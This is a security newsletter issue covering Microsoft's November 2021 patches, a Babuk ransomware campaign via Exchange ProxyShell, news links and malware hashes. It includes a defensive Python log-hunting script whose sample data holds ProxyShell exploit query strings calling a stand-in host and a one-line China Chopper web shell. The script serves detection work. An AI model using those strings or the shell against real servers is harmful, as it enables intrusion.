@RISK Newsletter for November 04, 2021
The consensus security vulnerability alert.
Vol. 21, Num. 44
This is a weekly newsletter that provides in-depth analysis of the latest vulnerabilities with straightforward remediation advice. Qualys supplies a large part of the newly-discovered vulnerability content used in this newsletter.
Archived issues may be found at the SANS @RISK Newsletter Archive.
CONTENTS:
NOTABLE RECENT SECURITY ISSUES
INTERESTING NEWS FROM AROUND THE SECURITY COMMUNITY
MOST PREVALENT MALWARE FILES November 4-11, 2021
TOP VULNERABILITY THIS WEEK: Microsoft patches six critical vulnerabilities in monthly security update
NOTABLE RECENT SECURITY ISSUES
SELECTED BY THE TALOS SECURITY INTELLIGENCE AND RESEARCH GROUP
Title: Microsoft discloses 56 vulnerabilities, including one Excel issue exploited in the wild
Description: Microsoft released its monthly security update Tuesday, disclosing 56 vulnerabilities across the company's software, hardware and firmware offerings, including one that is being actively exploited in the wild. November's update features six critical vulnerabilities, up from last month's two, which was far lower than Microsoft's average. The other 49 vulnerabilities fixed in this release are rated "important." CVE-2021-42292 is rated "important" rather than critical, yet it is the only vulnerability in this update that Microsoft reports as exploited in the wild. It is a security feature bypass in Microsoft Excel: a crafted workbook can open without the security prompt that would normally warn the user. With malicious email attachments still a primary initial-access vector, a bypass of this kind makes such lures more effective, because the victim never sees the warning and far less social engineering is needed to get the file opened.
Reference: https://blog.talosintelligence.com/2021/11/microsoft-patch-tuesday-for-nov-2021.html
Snort SIDs: 58519, 58520, 58539 – 58541
Snort 3 SID: 300054
Title: Microsoft Exchange vulnerabilities exploited once again for ransomware, this time with Babuk
Description: Cisco Talos recently discovered a malicious campaign deploying variants of the Babuk ransomware, predominantly affecting users in the U.S., with a smaller number of infections in the U.K., Germany, Ukraine, Finland, Brazil, Honduras and Thailand. The actor behind the campaign is sometimes referred to as Tortilla, after the payload file names used in the campaign, and has been active since July 2021. Before turning to ransomware, Tortilla experimented with other payloads such as Powercat, a PowerShell-based netcat clone that gives attackers a remote shell on Windows machines. Talos assesses with moderate confidence that the initial infection vector is exploitation of the ProxyShell vulnerabilities in Microsoft Exchange Server, followed by deployment of the China Chopper web shell.
Reference: https://blog.talosintelligence.com/2021/11/babuk-exploits-exchange.html
ClamAV signatures: Win.Ransomware.Packer-7473772-1, Win.Trojan.Swrort-5710536-0, Win.Trojan.Powercat-9840812-0, Win.Trojan.Swrort-9902494-0, Win.Exploit.PetitPotam-9902441-0, Win.Trojan.MSILAgent-9904224-0, Win.Malware.Agent-9904986-0, Win.Malware.Agent-9904987-0, Win.Malware.Agent-9904988-0, Win.Malware.Agent-9904989-0, Win.Malware.Agent-9904990-0, Win.Downloader.DarkTortilla-9904993-0, Win.Trojan.DarkTortilla-9904994-0
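The ProxyShell-to-web-shell chain above leaves two kinds of evidence on an Exchange server: the path-confusion requests to /autodiscover/autodiscover.json in the IIS logs, and the dropped .aspx file itself. The script below is an added example written for this newsletter, not code from Talos or the Tortilla campaign. It parses IIS W3C logs using their own #Fields: header, flags the ProxyShell autodiscover requests (the "@host/powershell" and "@host/mapi/nspi" query shape, and the X-Rps-CAT token used for the PowerShell back end), flags POSTs to .aspx pages under /aspnet_client/ where Exchange serves no application pages, and greps ASPX content for the one-line China Chopper eval() shell. The log lines, hostnames, addresses and file names are constructed for the demo, and the list of drop directories is an assumption to extend for your environment.

```python
"""Hunt for ProxyShell exploitation and a China Chopper drop in IIS logs.

Added example for the @RISK item above, not Talos or campaign code. All
log lines, hosts, IPs and paths below are constructed for illustration.
"""
import re
from typing import Dict, List, Tuple

# Constructed IIS W3C extended log excerpt (hypothetical server and clients).
SAMPLE_IIS_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status time-taken
2021-11-05 10:01:12 10.0.0.5 GET /owa/auth/logon.aspx url=/owa/ 443 - 203.0.113.7 Mozilla/5.0 200 15
2021-11-05 10:02:40 10.0.0.5 POST /autodiscover/autodiscover.json @evil.example/powershell/?X-Rps-CAT=VgEAVAdXaW5kb3dz 443 - 198.51.100.23 python-requests/2.26.0 200 88
2021-11-05 10:02:41 10.0.0.5 POST /autodiscover/autodiscover.json @evil.example/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@evil.example 443 - 198.51.100.23 python-requests/2.26.0 200 41
2021-11-05 10:03:10 10.0.0.5 POST /aspnet_client/system_web/help.aspx - 443 - 198.51.100.23 Mozilla/5.0 200 12
2021-11-05 10:05:00 10.0.0.5 GET /ecp/default.aspx - 443 DOMAIN\\admin 10.0.0.20 Mozilla/5.0 200 9
"""

# ProxyShell path confusion: "@anything/powershell" or "@anything/mapi/nspi" in the query.
PROXYSHELL_QUERY = re.compile(r"@[^/\s]+/(?:powershell|mapi/nspi)", re.IGNORECASE)
# The PowerShell back end is reached with a forged X-Rps-CAT token in the query.
RPS_TOKEN = re.compile(r"X-Rps-CAT=", re.IGNORECASE)
# Web-root directories where Exchange serves no legitimate .aspx (assumed list; extend it).
SHELL_DROP_DIRS = ("/aspnet_client/",)
ASPX_PAGE = re.compile(r"\.aspx$", re.IGNORECASE)
# One-line China Chopper ASPX shell: eval(Request.Item["pw"],"unsafe") or eval(Request["pw"],"unsafe").
CHOPPER_ASPX = re.compile(
    r"""eval\s*\(\s*Request\s*(?:\.Item)?\s*\[\s*["'][^"']+["']\s*\]\s*,\s*["']unsafe["']\s*\)""",
    re.IGNORECASE,
)


def parse_w3c(text: str) -> List[Dict[str, str]]:
    """Parse IIS W3C log text into dicts keyed by the names in the #Fields: header."""
    fields: List[str] = []
    rows: List[Dict[str, str]] = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#"):
            continue
        parts = line.split(" ")
        if len(parts) != len(fields):
            continue  # malformed or truncated line; a real tool would report it
        rows.append(dict(zip(fields, parts)))
    return rows


def classify(row: Dict[str, str]) -> List[str]:
    """Return detection tags for one log row (empty list if nothing matches)."""
    stem = row.get("cs-uri-stem", "")
    query = row.get("cs-uri-query", "")
    tags: List[str] = []
    if stem.lower().endswith("/autodiscover/autodiscover.json") and PROXYSHELL_QUERY.search(query):
        tags.append("proxyshell-powershell" if RPS_TOKEN.search(query) else "proxyshell-path-confusion")
    if row.get("cs-method") == "POST" and ASPX_PAGE.search(stem) and stem.lower().startswith(SHELL_DROP_DIRS):
        tags.append("webshell-post")
    return tags


def hunt(log_text: str) -> List[Tuple[str, str, str, str]]:
    """Run classify() over a log and return (tag, client ip, uri stem, query) hits."""
    hits = []
    for row in parse_w3c(log_text):
        for tag in classify(row):
            hits.append((tag, row["c-ip"], row["cs-uri-stem"], row["cs-uri-query"]))
    return hits


def find_chopper(files: Dict[str, str]) -> List[str]:
    """Return the paths whose content contains a China Chopper eval() shell."""
    return sorted(path for path, body in files.items() if CHOPPER_ASPX.search(body))


# Constructed ASPX contents: one China Chopper drop beside a benign Exchange page.
SAMPLE_FILES = {
    "aspnet_client/system_web/help.aspx": '<%@ Page Language="Jscript"%><%eval(Request.Item["p4ss"],"unsafe");%>',
    "owa/auth/logon.aspx": '<%@ Page language="C#" AutoEventWireup="false" %>\n<html><body>logon</body></html>',
}

if __name__ == "__main__":
    for hit in hunt(SAMPLE_IIS_LOG):
        print("LOG  ", *hit)
    for path in find_chopper(SAMPLE_FILES):
        print("FILE ", path)
```

On a real server, feed it the u_ex*.log files from the Exchange front-end W3SVC directory and the .aspx files under the web root; the query-string match is case-insensitive because the exploit path is reached through IIS path normalization, and a successful request to the PowerShell back end is the one to triage first, since it is what lets the attacker write the shell to disk.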
INTERESTING NEWS FROM AROUND THE SECURITY COMMUNITY
Congress passed a major infrastructure improvement bill that includes $1 billion in funds to improve the U.S.’s cybersecurity posture and upgrade critical infrastructure.
https://thehill.com/policy/cybersecurity/580649-state-and-local-officials-celebrate-passage-of-infrastructure-bill-with
The Biden administration is also ordering federal agencies to patch hundreds of high-profile cybersecurity vulnerabilities, some dating back to 2017.
https://thehill.com/policy/cybersecurity/579801-federal-agencies-ordered-to-patch-hundreds-of-vulnerabilities
Mobile devices belonging to six Palestinian human rights activists were found to be compromised with the NSO Group’s Pegasus spyware.
https://www.theguardian.com/world/2021/nov/08/palestinian-activists-mobile-phones-hacked-by-nso-says-report
The U.S. charged one Ukrainian and one Russian for their involvement with the REvil ransomware gang. The State Department is also offering up to $10 million in rewards for any information on the threat group’s leaders.
https://krebsonsecurity.com/2021/11/revil-ransom-arrest-6m-seizure-and-10m-reward/
Cybersecurity experts hope the arrests can make a tangible change to the threat landscape after years of threats to ransomware actors.
https://www.wired.com/story/ransomware-revil-arrest-kaseya/
U.S. defense contractor Electronic Warfare Associates disclosed a recent data breach this week, warning that attackers stole files containing sensitive information.
https://www.bleepingcomputer.com/news/security/us-defense-contractor-electronic-warfare-hit-by-data-breach/
Many federal agencies are likely to miss a deadline this week to enable multi-factor authentication to log into their networks.
https://www.cyberscoop.com/mfa-encryption-executive-order/
Security researchers discovered a new initial access broker, tracked as Zebra2104, that may be working with several threat groups, including the Phobos ransomware operation and the StrongPity APT.
https://blogs.blackberry.com/en/2021/11/zebra2104
Popular stock trading app Robinhood disclosed a data breach affecting 7 million users.
https://finance.yahoo.com/news/why-310-robinhoods-7-million-054515371.html
MOST PREVALENT MALWARE FILES November 4-11, 2021
COMPILED BY TALOS SECURITY INTELLIGENCE AND RESEARCH GROUP
SHA 256: 5bab2ae1cada90f37b821e4803912c5b351fda417bbf0a9c768b715c6d492e13
MD5: a6a7eb61172f8d988e47322ebf27bf6d
VirusTotal: https://www.virustotal.com/gui/file/5bab2ae1cada90f37b821e4803912c5b351fda417bbf0a9c768b715c6d492e13/details
Typical Filename: wx.exe
Claimed Product: N/A
Detection Name: Win.Dropper.Wingo::in07.talos
SHA 256: e5044d5ac2f8ea3090c2460a5f7d92a5a49e7fa040bf26659ec2f7c442dda762
MD5: 6ea750c9d69b7db6532d90ac0960e212
VirusTotal: https://www.virustotal.com/gui/file/e5044d5ac2f8ea3090c2460a5f7d92a5a49e7fa040bf26659ec2f7c442dda762/details
Typical Filename: deps.zip
Claimed Product: N/A
Detection Name: Auto.E5044D5AC2.242358.in07.Talos
SHA 256: 4d47791970c9e4b829ef0cc0049eecdfae3655f87a1e79620bbcc39eb8c21c8b
MD5: fdcdb2db7d4f9cb8b463ea2e8272d175
VirusTotal: https://www.virustotal.com/gui/file/4d47791970c9e4b829ef0cc0049eecdfae3655f87a1e79620bbcc39eb8c21c8b/details
Typical Filename: javarx2.dat
Claimed Product: N/A
Detection Name: Auto.4D47791970.232152.in07.Talos
SHA 256: 8b4216a7c50599b11241876ada8ae6f07b48f1abe6590c2440004ea4db5becc9
MD5: 34560233e751b7e95f155b6f61e7419a
VirusTotal: https://www.virustotal.com/gui/file/8b4216a7c50599b11241876ada8ae6f07b48f1abe6590c2440004ea4db5becc9/details
Typical Filename: SAntivirusService.exe
Claimed Product: A n t i v i r u s S e r v i c e
Detection Name: PUA.Win.Dropper.Segurazo::tpd
SHA 256: 1487f122c92f3bade35e03b6b0554a80b1563f2c167d9064263845653d912ec6
MD5: ee62e8f42ed70e717b2571c372e9de9a
VirusTotal: https://www.virustotal.com/gui/file/1487f122c92f3bade35e03b6b0554a80b1563f2c167d9064263845653d912ec6/details
Typical Filename: lHe
Claimed Product: N/A
Detection Name: W32.Gen:MinerDM.24ls.1201